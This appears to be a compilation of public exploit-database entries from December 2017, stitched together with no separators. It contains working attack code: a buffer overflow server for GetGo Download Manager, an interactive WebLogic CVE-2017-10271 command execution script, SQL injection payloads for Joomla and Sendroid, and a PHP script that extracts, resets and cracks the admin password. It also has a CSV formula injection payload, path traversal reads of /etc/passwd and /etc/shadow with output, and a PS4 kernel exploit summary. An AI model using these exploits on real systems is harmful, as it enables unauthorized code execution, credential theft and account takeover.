A buffer overflow vulnerability in GetGo Download Manager 5.3.0.2712 and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long response. To exploit this vulnerability, an attacker needs to issue a malicious-crafted payload in the HTTP Response Header. A successful attack could result in code execution on the victim computer.
2. Proof of Concept
def main():
host = "192.168.205.128"
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
evilbuffer = "A" * 4105
hardCodedEIP= "\x69\x9E\x45\x76" #This is a hardcoded EIP just for demo . As you can see on the screenshot, we hit a breakpoint, right here on this EIP. Do you see our stack!!! You need to change this.
pads = "C"*(6000 - len(evilbuffer + hardCodedEIP))
payload = evilbuffer + hardCodedEIP + pads
buffer = "HTTP/1.1 200 " + payload + "\r\n"
print cl.recv(1000)
cl.send(buffer)
print "[+] Sending buffer: OK\n"
sleep(3)
cl.close()
s.close()
if __name__ == '__main__':
import socket
from time import sleep
main()
3. Solution:
No solution as of yet.
import requests
import sys
url_in = sys.argv[1]
payload_url = url_in + "/wls-wsat/CoordinatorPortType"
payload_header = {'content-type': 'text/xml'}
def payload_command (command_in):
html_escape_table = {
"&": "&",
'"': """,
"'": "'",
">": ">",
"<": "<",
}
command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>"
payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \
" <soapenv:Header> " \
" <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \
" <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \
" <void class=\"java.lang.ProcessBuilder\"> \n" \
" <array class=\"java.lang.String\" length=\"3\">" \
" <void index = \"0\"> " \
" <string>cmd</string> " \
" </void> " \
" <void index = \"1\"> " \
" <string>/c</string> " \
" </void> " \
" <void index = \"2\"> " \
+ command_filtered + \
" </void> " \
" </array>" \
" <void method=\"start\"/>" \
" </void>" \
" </java>" \
" </work:WorkContext>" \
" </soapenv:Header>" \
" <soapenv:Body/>" \
"</soapenv:Envelope>"
return payload_1
def do_post(command_in):
result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)
if result.status_code == 500:
print "Command Executed \n"
else:
print "Something Went Wrong \n"
print "***************************************************** \n" \
"**************** Coded By 1337g ****************** \n" \
"* CVE-2017-10271 Blind Remote Command Execute EXP * \n" \
"***************************************************** \n"
while 1:
command_in = raw_input("Eneter your command here: ")
if command_in == "exit" : exit(0)
do_post(command_in)
# # # # #
# Exploit Title: Joomla! Component JEXTN FAQ Pro 4.0.0 - SQL Injection
# Dork: N/A
# Date: 24.12.2017
# Vendor Homepage: http://jextn.com/
# Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/faq/jextn-faq-pro/
# Version: 4.0.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-17875
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_jefaqpro&view=category&id=[SQL]&Itemid=494
#
# 11+OR+1+GROUP+BY+CONCAT_WS(0x3a,0x496873616e53656e63616e,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1
#
# # # # #
Exploit Title: SilverStripe CMS - 3.6.2 CSV Excel Macro Injection
Vendor Homepage: https://www.silverstripe.org/
Software Link: https://www.silverstripe.org/download
Discovered by: Ishaq Mohammed
Contact: https://twitter.com/security_prince
Website: https://about.me/security-prince
Category: web apps
Platform: PHP
Description:
In the CSV export feature of the SilverStripe CMS, it's possible for the
output to contain macros and scripts, which if imported without
sanitization into software (including Microsoft Excel) may be executed.
Proof of Concept
Steps to Reproduce:
1. Login with normal user's credentials
2. Access the below URL via your browser:
http://localhost/SilverStripe/admin/myprofile
3. Enter the below payload in the "First Name" field and save the profile"
@SUM(1+1)*cmd|' /C calc'!A0
4. Log in with admin's credentials on a different browser
5. Access te security page at the below link:
http://localhost/SilverStripe/admin/security/
6. Click on "Export to CSV" option and open the exported CSV file in any
Spreadsheet application
Solution:
The issue has been fixed in the latest release of SilverStripe which can be
downloaded from here: https://www.silverstripe.org/download
Reference:
https://www.silverstripe.org/download/security-releases/ss-2017-007
# Exploit Title: Sendroid - Bulk SMS Portal, Marketing Script( 5.0.0 - 6.5.0 ) - SQL Injection
# Google Dork: "welcome to * SMS portal"
# Date: 22/12/2017
# Exploit Author: Onwuka Gideon <dongiodmed[@]gmail[.]com>
Contact: http://twitter.com/@gideon_onwuka
# Vendor Homepage: http://ynetinteractive.com/
# Software Buy: https://codecanyon.net/item/sendroid-bulk-sms-portal-marketing-2way-messaging-script-with-mobile-app/14657225
# Version: 5.0.0 - 6.5.0
# Tested on: Mac OS
1. Description
The softaware suffers from SQL Injection:
"/API/index.php?action=compose&username=sender&api_key=sdsd&sender"
2. Script (Automatic takeover)
Attached to mail
4. How to run Script
You must have PHP installed on your system to run the script.
- First, copy the code to a file and save(eg: sendroid_exploit.php)
- Open up your command line and CD into the directory where you saved the file.
- Now, type "$ php -f sendroid_exploit.php url=http://localhost/sms"
Note: The URL should be a direct link to where the software is installed.
3. Proof of Concept
Run the script for example:
php -f sendroid_exploit.php url=http://localhost/sms
<?php
/**
* A script to authomatically get admin password
*
* @author: Onwuka Gideon <dongidomed[@]gmail[.]com>
*
*/
parse_str(implode('&', array_slice($argv, 1)), $_GET);
$queries =[
"sql_get_email" => "/*!12345SELECT*/+email+FROM+users+WHERE+username='admin'",
"sql_get_password0" => "/*!12345SELECT*/+SUBSTRING(password,1,32)+FROM+users+WHERE+username='admin'",
"sql_get_password1" => "/*!12345SELECT*/+SUBSTRING(password,33)+FROM+users+WHERE+username='admin'",
];
$payload = "/API/index.php?action=compose&username=asdasd%27)%20OR%20(SELECT%203321%20FROM(SELECT%20COUNT(*),CONCAT+((<query>),FLOOR(RAND(0)*2))x%20FROM%20/*!INFORMATION_SCHEMA*/.PLUGINS%20GROUP%20BY%20x)a)--%20RPjw&api_key=sdsd&sender";
//
checkCommands();
print_r(getEmailAndPassword($_GET['url'], $payload, $queries));
/**
*
* Checks if minimum expected command is issued
*
* @param: $_GET
* @return; Boolean
**/
function checkCommands(){
//url && shell
$url = $_GET['url'] ?? "";
if( $url == "" ) {
"Please enter a target";
help();
exit(1);
}
}
// Print help message
function help(){
echo "Invalid command " . PHP_EOL;
echo "eg php -f sendroid_exploit.php url=https://localhost/sms" . PHP_EOL;
echo "" . PHP_EOL;
}
// ==
// == Reset password and Get the Password hash
// ==
function getEmailAndPassword($url, $payload, $queries){
//>> Fetch admin email
echo "Fetching admin email....:";
$sql_get_email = $url . str_replace("<query>", $queries['sql_get_email'], $payload);
$email = extractValue(makeRequest($sql_get_email));
echo $email . PHP_EOL.PHP_EOL;
//<< EndFetch admin email
//>> Fetch admin old pass
echo "Fetching admin old password...:";
$sql_old_password0 = $url . str_replace("<query>", $queries['sql_get_password0'], $payload);
$sql_old_password1 = $url . str_replace("<query>", $queries['sql_get_password1'], $payload);
$old_password = extractValue(makeRequest($sql_old_password0), 'password') . extractValue(makeRequest($sql_old_password1), 'password');
echo $old_password . PHP_EOL.PHP_EOL;
//<< End Fetch admin old
// Now we have the old password and admin email
// reset password
echo "Resetting password...:";
$forgot_password = $url . "/administrator/index.php?reset&p";
makeRequest($forgot_password, "POST", ["userEmail" => $email]);
echo " Done!" . PHP_EOL.PHP_EOL;
//>> Fetch admin new password
echo "Getting new password...:";
$sql_new_password0 = $url . str_replace("<query>", $queries['sql_get_password0'], $payload);
$sql_new_password1 = $url . str_replace("<query>", $queries['sql_get_password1'], $payload);
$new_password = extractValue(makeRequest($sql_new_password0), 'password') . extractValue(makeRequest($sql_new_password1), 'password');
echo $new_password . PHP_EOL.PHP_EOL;
//<< End Fetch admin new password
//>> Cracking password
echo "Craking password...:";
$password = crackPassword($new_password);
echo $password . PHP_EOL.PHP_EOL;
//<< Cracking password
// return $sql_get_email;
return ["email" => $email, "password" => $password];
}
//
// POST and GET request
// ==
function makeRequest($url, $method = "GET", $parameter = []){
// Get cURL resource
$curl = curl_init();
// Set some options - we are passing in a useragent too here
if( strtolower($method) == "post" ){
curl_setopt_array($curl, [
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_URL => $url,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36',
CURLOPT_POST => 1,
CURLOPT_POSTFIELDS => $parameter
]);
}
else{
curl_setopt_array($curl, [
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_URL => $url,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 0_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'
]);
}
// Send the request & save response to $resp
$resp = curl_exec($curl);
// Close request to clear up some resources
curl_close($curl);
return $resp;
}
// Extract the real value
function extractValue($payload, $what = "email"){
$patterns = []; $patterns[0] = "/ for key 'group_key'/"; $patterns[1] = "/Duplicate entry /"; $patterns[2] = "/\s\s+/"; $patterns[3] = "/'/";
$replacements = []; $replacement[0] = ""; $replacements[1] = ""; $replacements[2] = ""; $replacements[3] = "";
$result = preg_replace($patterns, $replacements, $payload);
return substr($result, 0, -1);
}
function crackPassword($password){
echo " cracking... please wait... ";
$pwsalt = explode( ":",$password );
for ($i=1; $i < 20000000000000 ; $i++) {
if(md5($i . $pwsalt[1]) == $pwsalt[0] ) {
return $i;
}
}
return "Could not crack password";
}
If you successfully run the script, you'll get the admin password. You can login to the admin portal:
localhost/sms/administrator/
4. Solution:
Update to the latest version
# # # # #
# Exploit Title: Biometric Shift Employee Management System 3.0 - Local File Download
# Dork: N/A
# Date: 24.12.2017
# Vendor Homepage: https://www.shiftsystems.net/
# Software Link: https://codecanyon.net/item/white-label-shift-employee-management-system/21061908
# Version: 3.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-17876
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker download local files....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?user=download?name=VerAyari.Ver&path=[FILE]
#
# # # # #
# PS4 4.05 Kernel Exploit
---
## Summary
In this project you will find a full implementation of the "namedobj" kernel exploit for the PlayStation 4 on 4.05. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. This release however, *does not* contain any code related to defeating anti-piracy mechanisms or running homebrew. This exploit does include a loader that listens for payloads on port `9020` and will execute them upon receival.
You can find fail0verflow's original write-up on the bug [here](https://fail0verflow.com/blog/2017/ps4-namedobj-exploit/), you can find my technical write-up which dives more into implementation specifics ~~here~~ (this is still in progress and will be published within the next few days).
## Patches Included
The following patches are made by default in the kernel ROP chain:
1) Disable kernel write protection
2) Allow RWX (read-write-execute) memory mapping
3) Dynamic Resolving (`sys_dynlib_dlsym`) allowed from any process
4) Custom system call #11 (`kexec()`) to execute arbitrary code in kernel mode
5) Allow unprivileged users to call `setuid(0)` successfully. Works as a status check, doubles as a privilege escalation.
## Notes
- This exploit is actually incredibly stable at around 95% in my tests. WebKit very rarely crashes and the same is true with kernel.
- I've built in a patch so the kernel exploit will only run once on the system. You can still make additional patches via payloads.
- A custom syscall is added (#11) to execute any RWX memory in kernel mode, this can be used to execute payloads that want to do fun things like jailbreaking and patching the kernel.
- An SDK is not provided in this release, however a barebones one to get started with may be released at a later date.
- I've released a sample payload [here](http://www.mediafire.com/file/n4boybw0e06h892/debug_settings.bin) that will make the necessary patches to access the debug menu of the system via settings, jailbreaks, and escapes the sandbox.
## Contributors
I was not alone in this exploit's development, and would like to thank those who helped me along the way below.
- [qwertyoruiopz](https://twitter.com/qwertyoruiopz)
- [Flatz](https://twitter.com/flat_z)
- [CTurt](https://twitter.com/CTurtE)
- Anonymous
E-DB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43397.zip
Xerox DC260 EFI Fiery Controller Webtools 2.0 Arbitrary File Disclosure
Vendor: Electronics for Imaging, Inc.
Product web page: http://www.efi.com
Affected version: EFI Fiery Controller SW2.0
Xerox DocuColor 260, 250, 242
Summary: Drive production profitability with Fiery servers and workflow
products. See which Fiery digital front end is right for your current
or future print engines and business needs. Manage all your printers
from a single screen using this intuitive print job management interface.
Desc: Input passed thru the 'file' GET parameter in 'forceSave.php'
script is not properly sanitized before being used to read files. This
can be exploited by an unauthenticated attacker to read arbitrary files
on the affected system.
======================================================================
/wt3/js/save.js:
----------------
103: function parseSaveMessages() {
104: var urlNode = saveDocument.getElementsByTagName('url').item(0);
105: var url = urlNode.firstChild.data;
106: var forcedSaveUrl = "forceSave.php?file=" + url;
107: window.open(forcedSaveUrl, 'save_iframe', 'width=1,height=1');
====
/wt3/forceSave.php:
-------------------
1. <?php
2. //code posted by chrisputnam at gmail dot com
3. function readfile_chunked($filename,$retbytes=true)
4. {
5. $chunksize = 1*(1024*1024); // how many bytes per chunk
6. $buffer = '';
7. $cnt =0;
8. // $handle = fopen($filename, 'rb');
9. $handle = fopen($filename, 'rb');
10. if ($handle === false)
11. {
12. return false;
13. }
14. while (!feof($handle))
15. {
16. //read a chunk
17. $buffer = fread($handle, $chunksize);
18. //send the chunk
19. echo $buffer;
20. //flush the chunk
21. flush();
22. //increment the size read/sent
23. if ($retbytes)
24. {
25. $cnt += strlen($buffer);
26. }
27. }
28. //close file
29. $status = fclose($handle);
30. if ($retbytes && $status)
31. {
32. return $cnt; // return num. bytes delivered like readfile() does.
33. }
34. return $status;
35. }
36.
37. $filename = $_GET['file'];
38. if(!$filename)
39. {
40. echo "ERROR: No filename specified. Please try again.";
41. }
42. else
43. {
44. // fix for IE caching or PHP bug issue
45. header("Pragma: public");
46. header("Expires: 0"); // set expiration time
47. header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
48. // browser must download file from server instead of cache
49.
50. // force download dialog
51. header("Content-Type: application/force-download");
52. header("Content-Type: application/octet-stream");
53. header("Content-Type: application/download");
54.
55. // use the Content-Disposition header to supply a recommended filename and
56. // force the browser to display the save dialog.
57. header("Content-Disposition: attachment; filename=" . basename($filename) . ";");
58. header("Content-Transfer-Encoding: binary");
59.
60. header("Content-Length: " . filesize($filename));
61.
62. set_time_limit(0);
63. readfile_chunked($filename, false);
64.
65. exit();
66. }
67.
68. ?>
======================================================================
Tested on: Debian GNU/Linux 3.1
Apache
PHP/5.4.41
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5447
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php
20.12.2017
--
# curl "http://10.0.0.19/wt3/forceSave.php?file=/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:100:sync:/bin:/bin/sync
games:x:5:100:games:/usr/games:/bin/sh
...
...
# curl "http://10.0.0.19/wt3/forceSave.php?file=/etc/shadow"
root:LUUVeT6GbOy9I:10978:0:99999:7:::
daemon:*:10979:0:99999:7:::
bin:*:10979:0:99999:7:::
sys:*:10979:0:99999:7:::
sync:*:10979:0:99999:7:::
games:*:10979:0:99999:7:::
...
...